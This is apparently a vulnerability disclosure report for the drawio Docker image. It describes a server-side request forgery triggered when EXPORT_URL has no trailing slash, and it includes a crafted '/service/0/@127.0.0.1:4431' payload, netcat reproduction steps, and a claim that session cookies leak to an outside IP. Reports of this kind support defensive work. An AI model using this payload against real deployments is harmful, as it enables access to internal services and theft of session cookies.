Description

The problem came from this line of code

I ran docker-drawio with following command :

docker run -it --rm --name="draw" -e EXPORT_URL=http://somesite.com -p 8080:8080 -p 8443:8443 jgraph/drawio

if the drawio EXPORT_URL is set to an address without any / after the primary Hostname like http://somesite.com( not like http://somesite.com/something or http://somesite.com/), then an attacker can send a request to 127.0.0.1:4431 with a payload like http://draio-instance/service/0/@127.0.0.1:4431

Proof of Concept

1. run docker run -it --rm --name="draw" -e EXPORT_URL=http://google.com -p 8080:8080 -p 8443:8443 jgraph/drawio and then docker ps and get the drawio hash name ( called HN)
2. run docker exec -it HN /bin/bash
3. run apt update && apt install netcat && netcat -l 4430
4. go to http://draio-instance:8080/service/0/@127.0.0.1:4431
   you can see the http log on netcat had been recorded

it is a Full SSRF If you need another POC I can give you an HTTP logger script that returns some things to the attacker

Also, I don’t know what exactly is JSESSIONID cookie? but I can receive its content in a My public IP after redirect too!